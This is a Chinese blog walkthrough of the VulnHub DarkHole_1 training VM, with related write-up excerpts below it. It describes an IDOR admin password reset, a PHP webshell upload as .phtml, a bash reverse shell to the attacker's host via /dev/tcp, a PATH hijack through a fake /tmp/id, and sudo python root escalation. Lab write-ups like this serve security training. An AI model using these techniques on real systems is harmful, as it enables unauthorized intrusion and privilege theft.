VulnHub渗透靶场-DarkHole_1

最新推荐文章于 2025-03-01 12:17:17 发布
最新推荐文章于 2025-03-01 12:17:17 发布
阅读量1.7k 收藏 33
点赞数 28
分类专栏: 渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74631795/article/details/142259545
版权

一、环境准备

1.靶机下载

https://download.vulnhub.com/darkhole/DarkHole.zip

2.环境配置

kali攻击机和靶机均采用桥接模式,使用手机热点

二、信息收集

1.网络主机发现

sudo arp-scan -l

kali:192.168.181.235

靶机:192.168.181.159

2.目标主机扫描

sudo nmap -sS -sV -O -p- 192.168.181.159

开放80端口和22端口

访问80端口

右上角有登录功能

尝试使用弱密码登录失败

新建用户

使用新用户的账号密码登录

三、漏洞搜索

1.sqlmap搜索

使用sqlmap验证是否存在sql注入漏洞

设置level=3继续

没有发现sql注入漏洞

2.验证越权漏洞

2-1直接修改url的id值,操作失败

2-2尝试修改密码,使用bp抓包

猜测管理员的id为1,修改id=1重新发送

若存在漏洞,此时管理员的密码已经被修改为123456,回到刚才的登录页面,使用管理员账号进行登录

登录成功

四、漏洞利用

1.直接上传php一句话木马

2.修改后缀名为phtml

上传成功,路径为upload/test1.phtml

3.验证上传的木马

4.使用蚁剑连接

五、反弹SHELL

1.方法一

bash -i >& /dev/tcp/192.168.77.235/7777 0>&1

2.方法二

六、内网搜索

1.查看哪些用户账户配置了bash作为默认shell

cat /etc/passwd | grep /bin/bash

解释:

使用/bin/bash为默认shell的用户有root,darkhole,john

发现database.php含有john的信息

2.进入john的目录

发现toto的所有者是root

cat查看user.txt失败,需要john操作

运行toto,发现和id功能一样

3.重写id文件

新建id文件,并写入PATH,运行toto文件使用john身份调用id命令时就会获得shell

echo '/bin/bash' > /tmp/id
chmod +x /tmp/id
export PATH=/tmp:$PATH

解释:

4.再次运行toto,以john身份开启shell

查看user.txt和password

5.SSH连接

用户名为john,密码为password的内容

七、提权

sudo -l 列出当前用户可以执行的 sudo 命令

用户可以执行root权限的python 脚本

将shell命令写入脚本中,执行时,就可以得到root权限的shell了

echo 'import os;os.system("/bin/bash")' > file.py
sudo python3 /home/john/file.py

八、夺FLAG

VulnHub DarkHole靶机
qq_39428734的博客
04-13 629
扫描局域网内存活主机 得到靶机IP 使用namp扫描存活靶机开放了哪些端口 得到靶机开放了22,80端口 进入80端口的网页服务 查看网页源代码没有发现任何东西 爆破目录,查看有那些敏感目录 看到了一个配置文件和后台管理界面,登录界面等等 在config目录里面查看到了database.php文件 我们把它下载下来 啥也没有。。 后台管理界面显示没有权限 登录界面中看到了 正式的登录界面 我们去注册界面看看 注册一个用户并登录试试
vulnhub-DarkHole 1-靶场-打靶记录
lcc001114的博客
06-15 753
这里我们登录进去修改密码点change抓包,发现id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞(靶场没卵用),后端只校验用户名/邮箱/在数据库重没重复,并没有验证码进行注册限制。接下来用注册好的账号登录,在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量,等执行./toto时会执行id,执行id时就会执行我们的/bin/bash。正常来讲应该是成功了,但这却失败了可能是蚁剑的原因,反弹到kali机上试试。
darkhole靶机
2401_86440402的博客
10-09 690
我们使用工具git-dumper,发现不能用,我们安装以下git-dumper。百度寻找到kali中有git-dumper工具,使用此工具进行.git还原。我们抓页面包,然后将包放入CO2中来一梭子sqlmap,发现存在SQL注入。查看靶机的MAC地址,并使用nmap扫描与kali同一网段内的IP地址。在上述目录中查找,没有发现可用文件,这里我们尝试使用工具还原.git。进行信息收集一波,因为是靶机,没有资产信息,我们尝试寻找站点信息。发现除了登陆框剩下什么都没有,我们进行目录扫描,查看有哪些目录。
VulnHub-DarkHole_2靶机搭建保姆级教程2025
最新发布
CL1799438883的博客
03-01 240
‌是一个提供各种网络攻防靶场的平台‌,主要用于网络安全学习和渗透测试。用户可以通过Vulnhub下载各种虚拟镜像,这些镜像模拟了真实的网络环境,用户可以在这些环境中进行渗透测试和安全演练‌。下载zip文件并解压。
VulnHubdarkhole靶机实战
Aukum的博客
07-03 891
vulnhub-darkhole靶场实战。越权+sudo提权
看完这篇 教你玩转渗透测试靶机vulnhubDarkHole
Aluxian_的博客
05-30 2191
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
Vulnhub: DarkHole:1靶机
qq_43884092的博客
06-28 174
越权修改admin用户密码,上传phtml后缀的webshell,环境变量和sudo提权
2024年最新VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
2401_84239830的博客
05-01 1346
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。而且这个脚本属于用户losy,然后我们就可以使用 SSH 隧道连接端口 9999,然后,访问 127.0.0.1:9999 进行 RCE。id=1’ and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1338
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
vulnhub---FristiLeaks_1.3靶机
qq_43168364的博客
08-22 1101
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:FristiLeaks: 1.3靶机(192.168.15.155) 攻击机:kali Linux(192.168.15.129) 相关设置 根据官网的提示这里需要给靶机设置MAC地址 设置好了之后就可以开心的玩耍了。 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
CTF学习-Vulnhub 靶场DARKHOLE
dengpan119的博客
03-30 4294
文章目录前期准备一、信息收集二、使用步骤1.引入库2.读入数据总结 前期准备 靶机地址:https://www.vulnhub.com/entry/darkhole-2,740/ kali攻击机ip:172.X.X.176 windows 10攻击机:172.X.X.189 靶机ip:172.X.X.188 一、信息收集 首先利用arp-scan -l 扫描到靶机IP: 然后使用nmap扫描靶机端口信息 发现靶机开放了22和80业务端口,还有一个敏感信息.git仓库文件,那就把仓库转过来看看,使用gi
vulnhub靶机-DarkHole: 1
臭nana的博客
08-25 1133
靶机描述: Difficulty: Easy It's a box for beginners, but not easy, Good Luck Hint: Don't waste your time For Brute-Force 1、找到靶机ip:192.168.162.132 nmap -sn 192.168.162.0/24 2、扫描靶机端口,发现开放22和80端口 ┌──(root????kali)-[~] └─# nmap -A -p- 192.168.116.132
Neos的渗透测试靶机练习——DarkHole-1
qq_38678845的博客
01-18 1261
一次渗透测试练习
DarkHole靶机渗透
W_an_feng_的博客
06-10 409
DarkHole靶机渗透
Neos的渗透测试靶机练习——DarkHole-2
qq_38678845的博客
01-22 1350
一次渗透测试靶机练习
靶场-DarkHole1
weixin_58602402的博客
06-16 407
修改密码进行抓包,发现有个id值,在sql注入输入id为1时返回无权访问,猜测id值代表用户,构造payload修改其它用户的密码。4.切换回到/home/john 文件夹,再次执行./toto,就会启动一个 bash,这个 bash 就会切换 shell。2.发现/home/john/toto,切换到这个位置去执行,返回不同的id。开始进行绕过,直接将后缀改为jpg成功上传,同时找到文件上传的位置。2.通过蚁剑将木马上传,kali开启监听等待上线,反弹失败。7.发现个文件上传,尝试上传发现具有限制。
Vulnhub靶机DARKHOLE_ 2
LainWith的博客
09-14 1372
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值